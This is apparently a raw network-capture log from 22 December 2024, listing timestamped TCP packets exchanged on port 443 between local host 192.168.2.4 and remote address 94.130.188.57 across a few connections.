                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.427418947 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.455327988 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.455447912 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.455460072 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.455476999 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.455511093 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.474287987 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.503334999 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.655477047 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.655657053 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.655713081 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.655841112 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.655893087 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.656001091 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.699347019 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.699552059 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.747327089 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.776760101 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.776850939 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.776881933 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.776921988 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.777000904 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.777080059 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.777152061 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.777163982 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.777240038 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.777252913 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.777318954 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.777415991 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.777504921 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.777518034 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.777586937 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.777597904 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.777667999 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.777681112 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.777748108 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.819336891 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.895207882 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.895298004 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.895411015 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.895462990 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.895545959 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.895622015 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.895704985 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.895783901 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.895832062 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.895968914 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.896073103 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.896153927 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.896712065 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.896809101 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.896840096 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.896878004 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.896977901 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.897037983 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.897135973 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.897216082 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.897321939 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.897407055 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.897433043 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.897511005 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.897540092 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.897614956 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.897633076 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.897686005 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.939328909 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.015517950 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.015626907 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.015705109 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.015784979 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.015806913 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.015865088 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.015877962 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.015933990 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.015947104 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.015953064 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.016010046 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.016041040 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.016083002 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.016155005 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.016242981 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.016318083 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.016330957 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.016402960 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.016724110 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.016900063 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.016990900 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.017071009 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.017111063 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.017189980 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.017286062 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.017410994 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.017509937 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.019418955 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.019514084 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.019558907 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.019598007 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.019674063 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.019762993 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.019845963 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.019874096 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.019946098 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.019990921 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.020066977 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.020081043 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.020143986 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.020155907 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.020232916 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.020247936 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.020416021 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.020448923 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.020512104 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.020530939 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.020643950 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.020710945 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.020730019 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.020761967 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.020821095 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.020848036 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.020881891 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.020948887 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.021055937 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.021121025 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.021133900 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.021194935 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.042081118 CET4434980694.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.042268038 CET49806443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.042273045 CET4434980694.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.042335987 CET49806443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.043081045 CET49806443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.043143988 CET4434980694.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.043509007 CET49812443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.043557882 CET4434981294.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.043627024 CET49812443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.043802023 CET49812443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.043812037 CET4434981294.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.065777063 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.065833092 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.065994978 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.066078901 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.066127062 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.066215992 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.066276073 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.066318035 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.066400051 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.066515923 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.066559076 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.066631079 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.066654921 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.131859064 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.131987095 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.132010937 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.132236004 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.132240057 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.132301092 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.132312059 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.132360935 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.132397890 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.132426977 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.132436037 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.132457972 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.132477045 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.132504940 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.132519007 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.132538080 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.132538080 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.132591009 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.132602930 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.132643938 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.132652998 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.132711887 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.136425972 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.136473894 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.136569977 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.136590958 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.136622906 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.136699915 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.136769056 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.136869907 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.136883020 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.136975050 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.136979103 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.137065887 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.137166977 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.137211084 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.137322903 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.138922930 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.139092922 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.139411926 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.141334057 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.146241903 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.146272898 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.146289110 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.146362066 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.146430016 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.146456003 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.146500111 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.146545887 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.146580935 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.146601915 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.146615028 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.146655083 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.146691084 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.146698952 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.146732092 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.146732092 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.146739960 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.146756887 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.146805048 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.146837950 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.146876097 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.146893978 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.146929979 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.146938086 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.146941900 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.146989107 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.147028923 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.147058964 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.147064924 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.147100925 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.147102118 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.147140980 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.147175074 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.147186995 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.147211075 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.147222042 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.147254944 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.147294044 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.147396088 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.147430897 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.147507906 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.147566080 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.147635937 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.147779942 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.147856951 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.147886992 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.147965908 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.148003101 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.148058891 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.148104906 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.148137093 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.148149014 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.148170948 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.148195028 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.148230076 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.148252010 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.148297071 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.148317099 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.148320913 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.148365974 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.148437977 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.148461103 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.148500919 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.148564100 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.148596048 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.148626089 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.148683071 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.148993969 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.149027109 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.149095058 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.149113894 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.149146080 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.149208069 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.149235010 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.149266005 CET4434981194.130.188.57192.168.2.4
